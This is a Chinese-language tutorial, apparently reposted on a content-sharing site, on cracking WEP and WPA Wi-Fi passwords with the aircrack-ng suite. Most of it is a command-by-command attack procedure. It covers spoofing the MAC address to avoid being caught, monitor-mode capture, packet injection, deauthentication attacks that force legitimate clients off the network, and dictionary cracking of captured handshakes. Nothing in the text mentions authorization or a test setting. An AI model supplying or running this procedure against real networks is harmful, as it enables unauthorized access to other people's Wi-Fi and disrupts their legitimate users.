admin管理员组文章数量:1620374
-
Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:
airmon-ng 处理网卡工作模式
airodump-ng 抓包
aircrack-ng 破解
aireplay-ng 发包,干扰
另外还要用到以下 linux 命令:
ifconfig 查看修改网卡状态和参数
macchanger 伪造 MAC
iwconfig 主要针对无线网卡的工具 (同 ifconfig)
iwlist 获取无线网络的更详细信息 -
具体破解步骤:
1. 修改无线网卡状态:先 down 掉
2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能
3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
4. 修改无线网卡状态: up
5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标
6. 监听抓包:生成 .cap 或 .ivs
7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解 -
下面详细介绍一下各个命令的基本用法(参照命令的英文说明)
-
1. ifconfig
用来配置网卡,我们这里主要用来 禁用和启用 网卡:
ifconfig ath0 down
ifconfig ath0 up
禁用一下网卡的目的是为了下一步修改 MAC 。 -
2.macchanger
用来改变网卡的 MAC 地址,具体用法如下:
usage: macchanger [options] device
-h 显示帮助
-V 显示版本
-s 显示当前MAC
-e 不改变mac,使用硬件厂商写入的MAC
-a 自动生成一个同类型的MAC,同厂商的
-A 自动生成一个不同类型的MAC,不同厂商的
-r 生成任意MAC
-l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品
-m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。 -
3.airmon-ng
启动无线网卡进入 Monitor 模式,
useage: airmon-ng <start|stop|check> <interface> [channel]
<start|stop|check> 启动,停止,检测
<interface> 指定无线网卡
[channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了 -
下面以我的硬件实例来操作一下:
我的硬件是 atheros 的 a/b/g 无线网卡,在 linux 中显示为 ath0 ,我只列出我常用的命令步骤,不再做任何解释: -
ifconfig ath0 down
macchanger -r ath0
macchanger -r wifi0
ifconfig ath1 up
airmon-ng start ath1 6
iwconfig ath1
iwlist ath1 scanning
airodump-ng -w *.cap -c 6 ath1 -
aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1
aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1
aireplay-ng -3 -b <AP MAC> -h <my MAC> -i ath1 -
aircrack-ng -x -f 2 *.cap
aircrack-ng -w passdict.txt *.cap
aircrack-ng -n 64 -b apmac *.ivs
aircrack-ng -w passdict.txt -b 00:00:00:00:00:00 *.cap -
案例讲解:
-
使用命令airmon-ng start (外接网卡)将无线网卡切换到监听模式。
-
使用命令airodump-ng mon0(视情况而定)监听周围的所有ap信号。
-
选择要监听破解的wifi名称,记下bssid ,抓取wifi握手包。
命令为: airodump-ng --ivs -w 包名 --bssid 目标MAC -c 信道 mon0(接口名称)
-
开始监听目标ap的流量开始抓包,如果终端左上角出现WPA handshake 说明抓到了握手包,可以进行暴力破解了。
-
使用命令 aircrack-ng -w worldlist 握手包名。
-
等待一段时间,如果目标密码在字典中的话就可以找到。
-
进行Deauth攻击加速破解过程。
和破解WEP时不同,这里为了获得破解所需的WPA-PSK握手验证的整个完整数据包,无线黑客们将会发送一种称之为“Deauth”的数据包来将已经连接至无线路由器的合法无线客户端强制断开,此时,客户端就会自动重新连接无线路由器,黑客们也就有机会捕获到包含WPA-PSK握手验证的完整数据包了。此处具体输入命令如下:
aireplay-ng -0 1 –a AP的mac -c 客户端的mac wlan0
参数解释:
-0 采用deauth攻击模式,后面跟上攻击次数,这里我设置为1,大家可以根据实际情况设置为10不等;
-a 后跟AP的MAC地址;
-c 后跟客户端的MAC地址;
回车后将会看到如下图26所示的deauth报文发送的显示。
版权声明:本文标题:aircrack-ng 套件破解wifi(WPA) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/xitong/1728819295a1175241.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论